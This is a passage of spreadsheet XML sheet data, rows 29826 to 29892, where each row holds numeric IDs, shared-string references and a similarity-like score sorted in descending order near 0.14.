        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29826" ht="15.75" customHeight="1">
      <c r="A29826" s="1">
        <v>16460.0</v>
      </c>
      <c r="B29826" s="2">
        <v>4.6452429E7</v>
      </c>
      <c r="C29826" s="2" t="s">
        <v>28672</v>
      </c>
      <c r="D29826" s="2">
        <v>1.0</v>
      </c>
      <c r="E29826" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29826" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29827" ht="15.75" customHeight="1">
      <c r="A29827" s="1">
        <v>19367.0</v>
      </c>
      <c r="B29827" s="2">
        <v>5.5468669E7</v>
      </c>
      <c r="C29827" s="2" t="s">
        <v>28673</v>
      </c>
      <c r="D29827" s="2">
        <v>1.0</v>
      </c>
      <c r="E29827" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29827" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="29828" ht="15.75" customHeight="1">
      <c r="A29828" s="1">
        <v>3874.0</v>
      </c>
      <c r="B29828" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C29828" s="2" t="s">
        <v>28674</v>
      </c>
      <c r="D29828" s="2">
        <v>1.0</v>
      </c>
      <c r="E29828" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29828" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29829" ht="15.75" customHeight="1">
      <c r="A29829" s="1">
        <v>3877.0</v>
      </c>
      <c r="B29829" s="2">
        <v>4.0346083E7</v>
      </c>
      <c r="C29829" s="2" t="s">
        <v>28675</v>
      </c>
      <c r="D29829" s="2">
        <v>1.0</v>
      </c>
      <c r="E29829" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29829" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29830" ht="15.75" customHeight="1">
      <c r="A29830" s="1">
        <v>8169.0</v>
      </c>
      <c r="B29830" s="2">
        <v>5.3214115E7</v>
      </c>
      <c r="C29830" s="2" t="s">
        <v>28676</v>
      </c>
      <c r="D29830" s="2">
        <v>1.0</v>
      </c>
      <c r="E29830" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29830" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29831" ht="15.75" customHeight="1">
      <c r="A29831" s="1">
        <v>11931.0</v>
      </c>
      <c r="B29831" s="2">
        <v>2.5429746E7</v>
      </c>
      <c r="C29831" s="2" t="s">
        <v>28677</v>
      </c>
      <c r="D29831" s="2">
        <v>1.0</v>
      </c>
      <c r="E29831" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29831" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29832" ht="15.75" customHeight="1">
      <c r="A29832" s="1">
        <v>13087.0</v>
      </c>
      <c r="B29832" s="2">
        <v>3.3371852E7</v>
      </c>
      <c r="C29832" s="2" t="s">
        <v>28678</v>
      </c>
      <c r="D29832" s="2">
        <v>1.0</v>
      </c>
      <c r="E29832" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29832" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29833" ht="15.75" customHeight="1">
      <c r="A29833" s="1">
        <v>13148.0</v>
      </c>
      <c r="B29833" s="2">
        <v>3.3815302E7</v>
      </c>
      <c r="C29833" s="2" t="s">
        <v>28679</v>
      </c>
      <c r="D29833" s="2">
        <v>1.0</v>
      </c>
      <c r="E29833" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29833" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29834" ht="15.75" customHeight="1">
      <c r="A29834" s="1">
        <v>24387.0</v>
      </c>
      <c r="B29834" s="2">
        <v>1.0782197E7</v>
      </c>
      <c r="C29834" s="2" t="s">
        <v>28680</v>
      </c>
      <c r="D29834" s="2">
        <v>1.0</v>
      </c>
      <c r="E29834" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29834" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29835" ht="15.75" customHeight="1">
      <c r="A29835" s="1">
        <v>27785.0</v>
      </c>
      <c r="B29835" s="2">
        <v>2.3128182E7</v>
      </c>
      <c r="C29835" s="2" t="s">
        <v>28680</v>
      </c>
      <c r="D29835" s="2">
        <v>1.0</v>
      </c>
      <c r="E29835" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29835" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="29836" ht="15.75" customHeight="1">
      <c r="A29836" s="1">
        <v>16872.0</v>
      </c>
      <c r="B29836" s="2">
        <v>4.7956305E7</v>
      </c>
      <c r="C29836" s="2" t="s">
        <v>28681</v>
      </c>
      <c r="D29836" s="2">
        <v>1.0</v>
      </c>
      <c r="E29836" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29836" s="2">
        <v>0.1447574334898279</v>
      </c>
    </row>
    <row r="29837" ht="15.75" customHeight="1">
      <c r="A29837" s="1">
        <v>13320.0</v>
      </c>
      <c r="B29837" s="2">
        <v>3.4594261E7</v>
      </c>
      <c r="C29837" s="2" t="s">
        <v>28682</v>
      </c>
      <c r="D29837" s="2">
        <v>1.0</v>
      </c>
      <c r="E29837" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29837" s="2">
        <v>0.1444444444444445</v>
      </c>
    </row>
    <row r="29838" ht="15.75" customHeight="1">
      <c r="A29838" s="1">
        <v>8966.0</v>
      </c>
      <c r="B29838" s="2">
        <v>5.4927969E7</v>
      </c>
      <c r="C29838" s="2" t="s">
        <v>28683</v>
      </c>
      <c r="D29838" s="2">
        <v>1.0</v>
      </c>
      <c r="E29838" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29838" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="29839" ht="15.75" customHeight="1">
      <c r="A29839" s="1">
        <v>16359.0</v>
      </c>
      <c r="B29839" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C29839" s="2" t="s">
        <v>28684</v>
      </c>
      <c r="D29839" s="2">
        <v>1.0</v>
      </c>
      <c r="E29839" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29839" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="29840" ht="15.75" customHeight="1">
      <c r="A29840" s="1">
        <v>16397.0</v>
      </c>
      <c r="B29840" s="2">
        <v>4.6284595E7</v>
      </c>
      <c r="C29840" s="2" t="s">
        <v>28685</v>
      </c>
      <c r="D29840" s="2">
        <v>1.0</v>
      </c>
      <c r="E29840" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29840" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="29841" ht="15.75" customHeight="1">
      <c r="A29841" s="1">
        <v>16777.0</v>
      </c>
      <c r="B29841" s="2">
        <v>4.7723999E7</v>
      </c>
      <c r="C29841" s="2" t="s">
        <v>28686</v>
      </c>
      <c r="D29841" s="2">
        <v>1.0</v>
      </c>
      <c r="E29841" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29841" s="2">
        <v>0.1438492063492064</v>
      </c>
    </row>
    <row r="29842" ht="15.75" customHeight="1">
      <c r="A29842" s="1">
        <v>12760.0</v>
      </c>
      <c r="B29842" s="2">
        <v>3.1165695E7</v>
      </c>
      <c r="C29842" s="2" t="s">
        <v>28687</v>
      </c>
      <c r="D29842" s="2">
        <v>1.0</v>
      </c>
      <c r="E29842" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29842" s="2">
        <v>0.1437389770723105</v>
      </c>
    </row>
    <row r="29843" ht="15.75" customHeight="1">
      <c r="A29843" s="1">
        <v>33473.0</v>
      </c>
      <c r="B29843" s="2">
        <v>7973551.0</v>
      </c>
      <c r="C29843" s="2" t="s">
        <v>28688</v>
      </c>
      <c r="D29843" s="2">
        <v>1.0</v>
      </c>
      <c r="E29843" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29843" s="2">
        <v>0.1434494195688226</v>
      </c>
    </row>
    <row r="29844" ht="15.75" customHeight="1">
      <c r="A29844" s="1">
        <v>1285.0</v>
      </c>
      <c r="B29844" s="2">
        <v>2.5579737E7</v>
      </c>
      <c r="C29844" s="2" t="s">
        <v>28689</v>
      </c>
      <c r="D29844" s="2">
        <v>1.0</v>
      </c>
      <c r="E29844" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29844" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29845" ht="15.75" customHeight="1">
      <c r="A29845" s="1">
        <v>5386.0</v>
      </c>
      <c r="B29845" s="2">
        <v>4.5419559E7</v>
      </c>
      <c r="C29845" s="2" t="s">
        <v>28690</v>
      </c>
      <c r="D29845" s="2">
        <v>1.0</v>
      </c>
      <c r="E29845" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29845" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29846" ht="15.75" customHeight="1">
      <c r="A29846" s="1">
        <v>14426.0</v>
      </c>
      <c r="B29846" s="2">
        <v>3.9261517E7</v>
      </c>
      <c r="C29846" s="2" t="s">
        <v>28691</v>
      </c>
      <c r="D29846" s="2">
        <v>1.0</v>
      </c>
      <c r="E29846" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29846" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29847" ht="15.75" customHeight="1">
      <c r="A29847" s="1">
        <v>14485.0</v>
      </c>
      <c r="B29847" s="2">
        <v>3.9581224E7</v>
      </c>
      <c r="C29847" s="2" t="s">
        <v>28692</v>
      </c>
      <c r="D29847" s="2">
        <v>1.0</v>
      </c>
      <c r="E29847" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29847" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29848" ht="15.75" customHeight="1">
      <c r="A29848" s="1">
        <v>24932.0</v>
      </c>
      <c r="B29848" s="2">
        <v>1.2457588E7</v>
      </c>
      <c r="C29848" s="2" t="s">
        <v>28693</v>
      </c>
      <c r="D29848" s="2">
        <v>1.0</v>
      </c>
      <c r="E29848" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29848" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29849" ht="15.75" customHeight="1">
      <c r="A29849" s="1">
        <v>25635.0</v>
      </c>
      <c r="B29849" s="2">
        <v>1.4473908E7</v>
      </c>
      <c r="C29849" s="2" t="s">
        <v>28694</v>
      </c>
      <c r="D29849" s="2">
        <v>1.0</v>
      </c>
      <c r="E29849" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29849" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29850" ht="15.75" customHeight="1">
      <c r="A29850" s="1">
        <v>34258.0</v>
      </c>
      <c r="B29850" s="2">
        <v>8042214.0</v>
      </c>
      <c r="C29850" s="2" t="s">
        <v>28695</v>
      </c>
      <c r="D29850" s="2">
        <v>1.0</v>
      </c>
      <c r="E29850" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29850" s="2">
        <v>0.1432748538011697</v>
      </c>
    </row>
    <row r="29851" ht="15.75" customHeight="1">
      <c r="A29851" s="1">
        <v>2791.0</v>
      </c>
      <c r="B29851" s="2">
        <v>3.524357E7</v>
      </c>
      <c r="C29851" s="2" t="s">
        <v>28696</v>
      </c>
      <c r="D29851" s="2">
        <v>1.0</v>
      </c>
      <c r="E29851" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29851" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="29852" ht="15.75" customHeight="1">
      <c r="A29852" s="1">
        <v>7893.0</v>
      </c>
      <c r="B29852" s="2">
        <v>5.2442677E7</v>
      </c>
      <c r="C29852" s="2" t="s">
        <v>28697</v>
      </c>
      <c r="D29852" s="2">
        <v>1.0</v>
      </c>
      <c r="E29852" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29852" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="29853" ht="15.75" customHeight="1">
      <c r="A29853" s="1">
        <v>8999.0</v>
      </c>
      <c r="B29853" s="2">
        <v>5.4968139E7</v>
      </c>
      <c r="C29853" s="2" t="s">
        <v>28698</v>
      </c>
      <c r="D29853" s="2">
        <v>1.0</v>
      </c>
      <c r="E29853" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29853" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="29854" ht="15.75" customHeight="1">
      <c r="A29854" s="1">
        <v>13648.0</v>
      </c>
      <c r="B29854" s="2">
        <v>3.5932025E7</v>
      </c>
      <c r="C29854" s="2" t="s">
        <v>28699</v>
      </c>
      <c r="D29854" s="2">
        <v>1.0</v>
      </c>
      <c r="E29854" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29854" s="2">
        <v>0.1432748538011696</v>
      </c>
    </row>
    <row r="29855" ht="15.75" customHeight="1">
      <c r="A29855" s="1">
        <v>14588.0</v>
      </c>
      <c r="B29855" s="2">
        <v>4.0149237E7</v>
      </c>
      <c r="C29855" s="2" t="s">
        <v>28700</v>
      </c>
      <c r="D29855" s="2">
        <v>1.0</v>
      </c>
      <c r="E29855" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29855" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29856" ht="15.75" customHeight="1">
      <c r="A29856" s="1">
        <v>20913.0</v>
      </c>
      <c r="B29856" s="2">
        <v>1.6329999E7</v>
      </c>
      <c r="C29856" s="2" t="s">
        <v>28701</v>
      </c>
      <c r="D29856" s="2">
        <v>1.0</v>
      </c>
      <c r="E29856" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29856" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29857" ht="15.75" customHeight="1">
      <c r="A29857" s="1">
        <v>24620.0</v>
      </c>
      <c r="B29857" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C29857" s="2" t="s">
        <v>28702</v>
      </c>
      <c r="D29857" s="2">
        <v>1.0</v>
      </c>
      <c r="E29857" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29857" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29858" ht="15.75" customHeight="1">
      <c r="A29858" s="1">
        <v>26052.0</v>
      </c>
      <c r="B29858" s="2">
        <v>1.5524904E7</v>
      </c>
      <c r="C29858" s="2" t="s">
        <v>28703</v>
      </c>
      <c r="D29858" s="2">
        <v>1.0</v>
      </c>
      <c r="E29858" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29858" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29859" ht="15.75" customHeight="1">
      <c r="A29859" s="1">
        <v>26251.0</v>
      </c>
      <c r="B29859" s="2">
        <v>1.6329998E7</v>
      </c>
      <c r="C29859" s="2" t="s">
        <v>28701</v>
      </c>
      <c r="D29859" s="2">
        <v>1.0</v>
      </c>
      <c r="E29859" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29859" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29860" ht="15.75" customHeight="1">
      <c r="A29860" s="1">
        <v>31638.0</v>
      </c>
      <c r="B29860" s="2">
        <v>5146881.0</v>
      </c>
      <c r="C29860" s="2" t="s">
        <v>28704</v>
      </c>
      <c r="D29860" s="2">
        <v>1.0</v>
      </c>
      <c r="E29860" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29860" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29861" ht="15.75" customHeight="1">
      <c r="A29861" s="1">
        <v>33489.0</v>
      </c>
      <c r="B29861" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C29861" s="2" t="s">
        <v>28704</v>
      </c>
      <c r="D29861" s="2">
        <v>1.0</v>
      </c>
      <c r="E29861" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29861" s="2">
        <v>0.1432291666666667</v>
      </c>
    </row>
    <row r="29862" ht="15.75" customHeight="1">
      <c r="A29862" s="1">
        <v>15051.0</v>
      </c>
      <c r="B29862" s="2">
        <v>4.1645861E7</v>
      </c>
      <c r="C29862" s="2" t="s">
        <v>28705</v>
      </c>
      <c r="D29862" s="2">
        <v>1.0</v>
      </c>
      <c r="E29862" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29862" s="2">
        <v>0.1431924882629109</v>
      </c>
    </row>
    <row r="29863" ht="15.75" customHeight="1">
      <c r="A29863" s="1">
        <v>16677.0</v>
      </c>
      <c r="B29863" s="2">
        <v>4.7287557E7</v>
      </c>
      <c r="C29863" s="2" t="s">
        <v>28706</v>
      </c>
      <c r="D29863" s="2">
        <v>1.0</v>
      </c>
      <c r="E29863" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29863" s="2">
        <v>0.1429872495446266</v>
      </c>
    </row>
    <row r="29864" ht="15.75" customHeight="1">
      <c r="A29864" s="1">
        <v>7065.0</v>
      </c>
      <c r="B29864" s="2">
        <v>5.0233089E7</v>
      </c>
      <c r="C29864" s="2" t="s">
        <v>28707</v>
      </c>
      <c r="D29864" s="2">
        <v>1.0</v>
      </c>
      <c r="E29864" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29864" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="29865" ht="15.75" customHeight="1">
      <c r="A29865" s="1">
        <v>25960.0</v>
      </c>
      <c r="B29865" s="2">
        <v>1.5267586E7</v>
      </c>
      <c r="C29865" s="2" t="s">
        <v>28708</v>
      </c>
      <c r="D29865" s="2">
        <v>1.0</v>
      </c>
      <c r="E29865" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29865" s="2">
        <v>0.14272030651341</v>
      </c>
    </row>
    <row r="29866" ht="15.75" customHeight="1">
      <c r="A29866" s="1">
        <v>29240.0</v>
      </c>
      <c r="B29866" s="2">
        <v>3.0844182E7</v>
      </c>
      <c r="C29866" s="2" t="s">
        <v>28709</v>
      </c>
      <c r="D29866" s="2">
        <v>1.0</v>
      </c>
      <c r="E29866" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29866" s="2">
        <v>0.1424731182795699</v>
      </c>
    </row>
    <row r="29867" ht="15.75" customHeight="1">
      <c r="A29867" s="1">
        <v>6876.0</v>
      </c>
      <c r="B29867" s="2">
        <v>4.9713414E7</v>
      </c>
      <c r="C29867" s="2" t="s">
        <v>28710</v>
      </c>
      <c r="D29867" s="2">
        <v>1.0</v>
      </c>
      <c r="E29867" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29867" s="2">
        <v>0.1422558922558923</v>
      </c>
    </row>
    <row r="29868" ht="15.75" customHeight="1">
      <c r="A29868" s="1">
        <v>34156.0</v>
      </c>
      <c r="B29868" s="2">
        <v>9866204.0</v>
      </c>
      <c r="C29868" s="2" t="s">
        <v>28711</v>
      </c>
      <c r="D29868" s="2">
        <v>1.0</v>
      </c>
      <c r="E29868" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29868" s="2">
        <v>0.1421845574387948</v>
      </c>
    </row>
    <row r="29869" ht="15.75" customHeight="1">
      <c r="A29869" s="1">
        <v>33209.0</v>
      </c>
      <c r="B29869" s="2">
        <v>7199634.0</v>
      </c>
      <c r="C29869" s="2" t="s">
        <v>28712</v>
      </c>
      <c r="D29869" s="2">
        <v>1.0</v>
      </c>
      <c r="E29869" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29869" s="2">
        <v>0.1419753086419754</v>
      </c>
    </row>
    <row r="29870" ht="15.75" customHeight="1">
      <c r="A29870" s="1">
        <v>11277.0</v>
      </c>
      <c r="B29870" s="2">
        <v>2.0781768E7</v>
      </c>
      <c r="C29870" s="2" t="s">
        <v>28713</v>
      </c>
      <c r="D29870" s="2">
        <v>1.0</v>
      </c>
      <c r="E29870" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29870" s="2">
        <v>0.1418918918918919</v>
      </c>
    </row>
    <row r="29871" ht="15.75" customHeight="1">
      <c r="A29871" s="1">
        <v>16355.0</v>
      </c>
      <c r="B29871" s="2">
        <v>4.6107379E7</v>
      </c>
      <c r="C29871" s="2" t="s">
        <v>28714</v>
      </c>
      <c r="D29871" s="2">
        <v>1.0</v>
      </c>
      <c r="E29871" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29871" s="2">
        <v>0.1418650793650794</v>
      </c>
    </row>
    <row r="29872" ht="15.75" customHeight="1">
      <c r="A29872" s="1">
        <v>24622.0</v>
      </c>
      <c r="B29872" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C29872" s="2" t="s">
        <v>28715</v>
      </c>
      <c r="D29872" s="2">
        <v>1.0</v>
      </c>
      <c r="E29872" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29872" s="2">
        <v>0.1417910447761195</v>
      </c>
    </row>
    <row r="29873" ht="15.75" customHeight="1">
      <c r="A29873" s="1">
        <v>33549.0</v>
      </c>
      <c r="B29873" s="2">
        <v>8182726.0</v>
      </c>
      <c r="C29873" s="2" t="s">
        <v>28716</v>
      </c>
      <c r="D29873" s="2">
        <v>1.0</v>
      </c>
      <c r="E29873" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29873" s="2">
        <v>0.1417910447761195</v>
      </c>
    </row>
    <row r="29874" ht="15.75" customHeight="1">
      <c r="A29874" s="1">
        <v>5270.0</v>
      </c>
      <c r="B29874" s="2">
        <v>4.5147927E7</v>
      </c>
      <c r="C29874" s="2" t="s">
        <v>28717</v>
      </c>
      <c r="D29874" s="2">
        <v>1.0</v>
      </c>
      <c r="E29874" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29874" s="2">
        <v>0.1414930555555556</v>
      </c>
    </row>
    <row r="29875" ht="15.75" customHeight="1">
      <c r="A29875" s="1">
        <v>15976.0</v>
      </c>
      <c r="B29875" s="2">
        <v>4.4848824E7</v>
      </c>
      <c r="C29875" s="2" t="s">
        <v>28718</v>
      </c>
      <c r="D29875" s="2">
        <v>1.0</v>
      </c>
      <c r="E29875" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29875" s="2">
        <v>0.1413398692810458</v>
      </c>
    </row>
    <row r="29876" ht="15.75" customHeight="1">
      <c r="A29876" s="1">
        <v>12011.0</v>
      </c>
      <c r="B29876" s="2">
        <v>2.6040948E7</v>
      </c>
      <c r="C29876" s="2" t="s">
        <v>28719</v>
      </c>
      <c r="D29876" s="2">
        <v>1.0</v>
      </c>
      <c r="E29876" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29876" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="29877" ht="15.75" customHeight="1">
      <c r="A29877" s="1">
        <v>12422.0</v>
      </c>
      <c r="B29877" s="2">
        <v>2.915619E7</v>
      </c>
      <c r="C29877" s="2" t="s">
        <v>28720</v>
      </c>
      <c r="D29877" s="2">
        <v>1.0</v>
      </c>
      <c r="E29877" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29877" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="29878" ht="15.75" customHeight="1">
      <c r="A29878" s="1">
        <v>13283.0</v>
      </c>
      <c r="B29878" s="2">
        <v>3.4426149E7</v>
      </c>
      <c r="C29878" s="5" t="s">
        <v>28721</v>
      </c>
      <c r="D29878" s="2">
        <v>1.0</v>
      </c>
      <c r="E29878" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29878" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="29879" ht="15.75" customHeight="1">
      <c r="A29879" s="1">
        <v>13857.0</v>
      </c>
      <c r="B29879" s="2">
        <v>3.692713E7</v>
      </c>
      <c r="C29879" s="2" t="s">
        <v>28722</v>
      </c>
      <c r="D29879" s="2">
        <v>1.0</v>
      </c>
      <c r="E29879" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29879" s="2">
        <v>0.1413255360623782</v>
      </c>
    </row>
    <row r="29880" ht="15.75" customHeight="1">
      <c r="A29880" s="1">
        <v>24604.0</v>
      </c>
      <c r="B29880" s="2">
        <v>1.1435929E7</v>
      </c>
      <c r="C29880" s="2" t="s">
        <v>28723</v>
      </c>
      <c r="D29880" s="2">
        <v>1.0</v>
      </c>
      <c r="E29880" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29880" s="2">
        <v>0.1412037037037038</v>
      </c>
    </row>
    <row r="29881" ht="15.75" customHeight="1">
      <c r="A29881" s="1">
        <v>11574.0</v>
      </c>
      <c r="B29881" s="2">
        <v>2.2784318E7</v>
      </c>
      <c r="C29881" s="2" t="s">
        <v>28724</v>
      </c>
      <c r="D29881" s="2">
        <v>1.0</v>
      </c>
      <c r="E29881" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29881" s="2">
        <v>0.1412037037037037</v>
      </c>
    </row>
    <row r="29882" ht="15.75" customHeight="1">
      <c r="A29882" s="1">
        <v>12996.0</v>
      </c>
      <c r="B29882" s="2">
        <v>3.2784316E7</v>
      </c>
      <c r="C29882" s="2" t="s">
        <v>28725</v>
      </c>
      <c r="D29882" s="2">
        <v>1.0</v>
      </c>
      <c r="E29882" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29882" s="2">
        <v>0.1412037037037037</v>
      </c>
    </row>
    <row r="29883" ht="15.75" customHeight="1">
      <c r="A29883" s="1">
        <v>32585.0</v>
      </c>
      <c r="B29883" s="2">
        <v>5783757.0</v>
      </c>
      <c r="C29883" s="2" t="s">
        <v>28726</v>
      </c>
      <c r="D29883" s="2">
        <v>1.0</v>
      </c>
      <c r="E29883" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29883" s="2">
        <v>0.1412037037037037</v>
      </c>
    </row>
    <row r="29884" ht="15.75" customHeight="1">
      <c r="A29884" s="1">
        <v>31743.0</v>
      </c>
      <c r="B29884" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C29884" s="2" t="s">
        <v>28727</v>
      </c>
      <c r="D29884" s="2">
        <v>1.0</v>
      </c>
      <c r="E29884" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29884" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="29885" ht="15.75" customHeight="1">
      <c r="A29885" s="1">
        <v>34093.0</v>
      </c>
      <c r="B29885" s="2">
        <v>9695747.0</v>
      </c>
      <c r="C29885" s="2" t="s">
        <v>28728</v>
      </c>
      <c r="D29885" s="2">
        <v>1.0</v>
      </c>
      <c r="E29885" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29885" s="2">
        <v>0.1410256410256411</v>
      </c>
    </row>
    <row r="29886" ht="15.75" customHeight="1">
      <c r="A29886" s="1">
        <v>4161.0</v>
      </c>
      <c r="B29886" s="2">
        <v>4.1517759E7</v>
      </c>
      <c r="C29886" s="2" t="s">
        <v>28729</v>
      </c>
      <c r="D29886" s="2">
        <v>1.0</v>
      </c>
      <c r="E29886" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29886" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29887" ht="15.75" customHeight="1">
      <c r="A29887" s="1">
        <v>11626.0</v>
      </c>
      <c r="B29887" s="2">
        <v>2.3129511E7</v>
      </c>
      <c r="C29887" s="2" t="s">
        <v>28730</v>
      </c>
      <c r="D29887" s="2">
        <v>1.0</v>
      </c>
      <c r="E29887" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29887" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29888" ht="15.75" customHeight="1">
      <c r="A29888" s="1">
        <v>12423.0</v>
      </c>
      <c r="B29888" s="2">
        <v>2.9173977E7</v>
      </c>
      <c r="C29888" s="2" t="s">
        <v>28731</v>
      </c>
      <c r="D29888" s="2">
        <v>1.0</v>
      </c>
      <c r="E29888" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29888" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29889" ht="15.75" customHeight="1">
      <c r="A29889" s="1">
        <v>15857.0</v>
      </c>
      <c r="B29889" s="2">
        <v>4.4474605E7</v>
      </c>
      <c r="C29889" s="2" t="s">
        <v>28732</v>
      </c>
      <c r="D29889" s="2">
        <v>1.0</v>
      </c>
      <c r="E29889" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29889" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29890" ht="15.75" customHeight="1">
      <c r="A29890" s="1">
        <v>20093.0</v>
      </c>
      <c r="B29890" s="2">
        <v>9519817.0</v>
      </c>
      <c r="C29890" s="2" t="s">
        <v>28733</v>
      </c>
      <c r="D29890" s="2">
        <v>1.0</v>
      </c>
      <c r="E29890" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29890" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29891" ht="15.75" customHeight="1">
      <c r="A29891" s="1">
        <v>20110.0</v>
      </c>
      <c r="B29891" s="2">
        <v>9985273.0</v>
      </c>
      <c r="C29891" s="2" t="s">
        <v>28734</v>
      </c>
      <c r="D29891" s="2">
        <v>1.0</v>
      </c>
      <c r="E29891" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29891" s="2">
        <v>0.1408045977011495</v>
      </c>
    </row>
    <row r="29892" ht="15.75" customHeight="1">
      <c r="A29892" s="1">
        <v>21532.0</v>
      </c>
      <c r="B29892" s="2">
        <v>2.3429248E7</v>
      </c>
      <c r="C29892" s="2" t="s">
        <v>28735</v>
      </c>
      <c r="D29892" s="2">
        <v>1.0</v>
      </c>
      <c r="E29892" s="3" t="s">
        <v>28514</v>
      </c>
      <c r="F29892" s="2">
        <v>0.1408045977011495</v>
      </c>
